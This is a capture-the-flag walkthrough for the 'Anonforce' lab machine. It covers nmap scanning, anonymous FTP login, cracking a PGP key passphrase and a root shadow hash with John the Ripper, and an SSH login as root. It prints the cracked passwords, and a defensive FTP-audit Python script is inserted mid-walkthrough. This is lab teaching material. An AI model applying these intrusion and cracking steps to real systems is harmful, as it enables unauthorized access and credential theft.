Anonforce

Phase 1: Reconnaissance (Information Gathering)

export TARGET_IP=10.10.178.7
nmap -p- --min-rate 5000 $TARGET_IP

Not shown: 65392 closed tcp ports (reset), 141 filtered tcp ports (no-response)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh

Phase 2: Enumeration and Vulnerability Analysis

Based on the reconnaissance, we focus on the open services to identify potential vulnerabilities.

  1. FTP Enumeration:

    • Command: ftp 10.10.178.7 21

    • Explanation: Attempts to connect to the FTP server on the target.

    • Interaction and Results (Annotated):

      # Connected to 10.10.178.7.
      # 220 (vsFTPd 3.0.3)            <-- Banner reveals the FTP server software and version.
      Name (10.10.178.7:kali): anonymous   # Attempting anonymous login.
      # 331 Please specify the password.
      Password:                       # BLANK <-- Entering a blank password.
      # 230 Login successful.         <-- Anonymous login is permitted! This is a major vulnerability.
      # Remote system type is UNIX.
      # Using binary mode to transfer files.
      ftp> help                       # Displays available FTP commands.
      ftp> ls                         # Lists files in the current directory.
      ftp> cd /home/melodias          # Navigates to user "melodias" home directory.
      ftp> get user.txt               # Downloads a file named "user.txt".
      ftp> cd /notread                # Navigates to the directory named "notread".
      ftp> ls                         # Lists files.
      -rwxrwxrwx    1 1000     1000          524 Aug 11  2019 backup.pgp
      -rwxrwxrwx    1 1000     1000         3762 Aug 11  2019 private.asc

    • Analysis:

      • Anonymous FTP Access: The most critical finding is that anonymous FTP access is enabled, allowing anyone to connect and browse (and potentially modify) files.
      • Sensitive Files: The backup.pgp and private.asc files are discovered. The .pgp extension suggests an encrypted file (likely using PGP or GPG), and the .asc extension often indicates an ASCII-armored key file (likely a private key). The file permissions (-rwxrwxrwx) are overly permissive, allowing any user (including the anonymous FTP user) to read, write, and execute these files. This is another significant security flaw.
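As an added, defender-side example that is not part of the original walkthrough: a small Python audit that parses a UNIX-style FTP directory listing of the shape shown above, flags world-writable entries and files whose extension suggests key material, and checks a vsftpd.conf for the anonymous_enable setting that made this login possible. The sample listing and the config strings are constructed for illustration.

```python
import re
from dataclasses import dataclass

# Constructed sample listing: same shape as the "ftp> ls" output in /notread above.
SAMPLE_LISTING = """\
-rwxrwxrwx    1 1000     1000          524 Aug 11  2019 backup.pgp
-rwxrwxrwx    1 1000     1000         3762 Aug 11  2019 private.asc
-rw-r--r--    1 0        0              33 Aug 11  2019 user.txt
drwxr-xr-x    2 0        0            4096 Aug 11  2019 notread
"""

# Extensions that commonly carry PGP/GPG or TLS/SSH key material.
KEY_MATERIAL_SUFFIXES = (".asc", ".pgp", ".gpg", ".pem", ".key")

# mode, links, owner, group, size, month, day, year-or-time, name
LISTING_RE = re.compile(
    r"^(?P<mode>[-dl][rwxsStT-]{9})\s+\d+\s+\S+\s+\S+\s+\d+\s+\S+\s+\d+\s+\S+\s+(?P<name>.+)$"
)

@dataclass
class Finding:
    name: str
    reasons: tuple

def audit_listing(listing: str) -> list:
    """Return the entries a defender should look at: world-writable regular files
    and files whose name suggests key material."""
    findings = []
    for line in listing.splitlines():
        m = LISTING_RE.match(line)
        if not m:
            continue  # skips "total N" lines and anything not in ls -l shape
        mode, name = m.group("mode"), m.group("name")
        reasons = []
        if mode[0] == "-" and mode[8] == "w":  # "other" write bit on a regular file
            reasons.append("world-writable")
        if name.lower().endswith(KEY_MATERIAL_SUFFIXES):
            reasons.append("possible key material")
        if reasons:
            findings.append(Finding(name, tuple(reasons)))
    return findings

def anonymous_ftp_enabled(vsftpd_conf: str) -> bool:
    """True when a vsftpd.conf permits anonymous logins. vsftpd.conf(5) documents
    the built-in default of anonymous_enable as YES, so an absent key counts as enabled."""
    for line in vsftpd_conf.splitlines():
        line = line.split("#", 1)[0].strip()  # drop comments
        if "=" in line:
            key, value = (part.strip() for part in line.split("=", 1))
            if key == "anonymous_enable":
                return value.upper() == "YES"
    return True
```

The corrected server-side setting is simply `anonymous_enable=NO` in vsftpd.conf, together with file modes on the served tree that do not grant write (or any access to key material) to the FTP user.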

Phase 3: Exploitation

  1. Decrypting the Backup:

    • Strategy: We have an encrypted file (backup.pgp) and what appears to be a private key (private.asc). We'll attempt to decrypt the backup using the private key.

    • Steps (Annotated):

      gpg --import private.asc  # Imports the private key into the GPG keyring.
      # GPG will prompt for a passphrase if the key is protected.

    • Passphrase Cracking: Often, private keys are protected with a passphrase. If the import fails or prompts for a password, we need to crack it.

      gpg2john private.asc > hash  # Extracts the password hash from the private key file.
      # `gpg2john` is a tool from the John the Ripper suite.
      john hash --wordlist=/usr/share/wordlists/rockyou.txt  # Attempts to crack the hash.
      # Output: xbox360 (the cracked passphrase)

      gpg --import private.asc  # Re-import the key, this time providing the passphrase.
      # Enter "xbox360" when prompted.
      gpg --decrypt backup.pgp  # Attempts to decrypt the backup.pgp file.
      # Enter "xbox360" again when prompted.

  2. Gaining Root Access:

    • Once decrypted, backup.pgp turns out to be a copy of the target's /etc/shadow file.

    • Steps:

      # The decrypted backup.pgp contains the shadow hash for root.
      echo -e 'root:$6$07nYFaYf$F4VMaegmz7dKjsTukBLh6cP01iMmL7CiQDt1ycIm6a.bsOIBp0DwXVb9XI2EtULXJzBtaMZMNd2tV4uob5RVM0:18120:0:99999:7:::' > roothash
      # Writes the root entry to a new file called roothash.

      john roothash --wordlist=/usr/share/wordlists/rockyou.txt  # Attempts to crack the root password hash.
      # Output: hikari (the cracked password)

      ssh root@$TARGET_IP  # Connect to the target as root via SSH.
      # Enter "hikari" as the password.
      id  # Verify root access. Output should be: uid=0(root) gid=0(root) groups=0(root)